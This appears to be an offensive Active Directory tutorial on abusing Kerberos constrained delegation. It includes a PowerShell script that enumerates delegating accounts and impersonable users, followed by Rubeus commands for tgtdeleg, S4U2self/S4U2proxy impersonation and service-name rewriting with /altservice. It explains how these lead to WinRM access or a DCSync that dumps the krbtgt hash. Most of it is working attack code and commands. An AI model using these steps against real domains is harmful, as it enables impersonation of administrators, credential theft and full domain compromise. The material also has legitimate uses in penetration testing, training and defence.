The following actions require control of a user or machine account that is configured for constrained delegation, i.e. one whose msDS-AllowedToDelegateTo attribute is populated. For S4U2self to return a forwardable ticket the account also needs protocol transition (the TrustedToAuthForDelegation bit, 0x1000000, in userAccountControl); without it the S4U2proxy step fails unless we already hold a forwardable service ticket that the impersonated user obtained for us with Kerberos.
Find out which accounts are configured for constrained delegation, and which of them have protocol transition enabled.
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo,userAccountControl
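The enumeration above, extended into an added example (not code from the original page): it lists every delegating account together with its protocol-transition flag and the target hosts, and checks whether a candidate user can be impersonated at all. It assumes the ActiveDirectory (RSAT) module is installed and that the current user can read the domain; the account name 'Administrator' in the usage line is a placeholder.

```powershell
# Added example; not code from the original page. Assumes the ActiveDirectory
# module (RSAT) is installed and the current user can read the domain.
Import-Module ActiveDirectory

# userAccountControl bits that matter for constrained delegation abuse
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition ("use any authentication protocol")
$NOT_DELEGATED                  = 0x100000   # "account is sensitive and cannot be delegated"

function Get-ConstrainedDelegation {
    # Every user or computer object whose msDS-AllowedToDelegateTo is populated.
    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
        -Properties sAMAccountName, userAccountControl, msDS-AllowedToDelegateTo |
    ForEach-Object {
        $uac  = [int]$_.userAccountControl
        $spns = @($_.'msDS-AllowedToDelegateTo')
        # Hosts reachable via S4U2proxy. The service class in the SPN is not
        # validated by the KDC, so every service running as the target host's
        # account (cifs, http, ldap on a machine account) is effectively in scope.
        $hosts = $spns |
            ForEach-Object { (($_ -split '/', 2)[1]) -replace '[:/].*$', '' } |
            Sort-Object -Unique
        [pscustomobject]@{
            Account            = $_.sAMAccountName
            ObjectClass        = $_.ObjectClass
            ProtocolTransition = [bool]($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
            TargetHosts        = $hosts -join ', '
            AllowedSPNs        = $spns -join ', '
        }
    }
}

function Test-CanBeImpersonated {
    # The user we want to impersonate must not be in Protected Users and must
    # not carry NOT_DELEGATED, otherwise S4U2self/S4U2proxy yields no usable ticket.
    param([Parameter(Mandatory)][string]$SamAccountName)
    $u = Get-ADUser -Identity $SamAccountName -Properties userAccountControl, memberOf
    $sensitive = [bool]([int]$u.userAccountControl -band $NOT_DELEGATED)
    $protected = [bool](@($u.memberOf) -match '^CN=Protected Users,')
    [pscustomobject]@{
        User           = $SamAccountName
        SensitiveFlag  = $sensitive
        ProtectedUsers = $protected
        Impersonable   = -not ($sensitive -or $protected)
    }
}

# Usage ('Administrator' is a placeholder for the user to impersonate)
Get-ConstrainedDelegation | Where-Object ProtocolTransition | Format-Table -AutoSize
Test-CanBeImpersonated -SamAccountName 'Administrator'
```

Accounts with ProtocolTransition set to False are the Kerberos-only case from the note above; they still appear in the listing but need a forwardable service ticket from the victim instead of S4U2self.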
Get a TGT for the delegating account. This only works once we already execute code as that account: the command below has to run from a session running as it. tgtdeleg needs no elevation; it abuses the GSS-API delegation flag to obtain a usable TGT for the current user without touching LSASS.
The below command is executed from a terminal session running as the delegating account.
Rubeus.exe tgtdeleg /nowrap
Use the acquired TGT to request a service ticket (TGS) for the desired service on the target machine as the impersonated user (S4U2self followed by S4U2proxy). The SPN given to /msdsspn must be one listed in the account's msDS-AllowedToDelegateTo; /impersonateuser is the victim, not the delegating account.
Rubeus.exe s4u /ticket:<base64 TGT> /impersonateuser:<user to impersonate> /dc:<domain-controller> /domain:<domain> /msdsspn:<service>/<machine> /ptt
If we hold the delegating account's Kerberos key (AES256, or its NT hash via /rc4) we can request the TGT and the TGS in a single step; Rubeus asks for the TGT itself and then performs S4U.
Rubeus.exe s4u /user:<delegating account> /aes256:<AES256 key> /impersonateuser:<user to impersonate> /msdsspn:"<service>/<machine>" /domain:<domain> /ptt
The service name (sname) of a ticket is not covered by its encrypted part, and the KDC only checks that the requested SPN appears in msDS-AllowedToDelegateTo. That means we can rewrite the service class to any other service running under the same account on that host; Rubeus does this with /altservice:<svc1,svc2,...>, one ticket per listed service.
For example, if only time/<machine> is allowed we can still get a TGS for HTTP, which gives us a remote connection over WinRM / PowerShell Remoting, or, when the target is a Domain Controller, for LDAP, which lets us run DCSync as the impersonated user (a Domain Admin, say) and dump the krbtgt hash. Caveat: the impersonated user must not be a member of Protected Users or marked "account is sensitive and cannot be delegated", otherwise the S4U requests return nothing usable.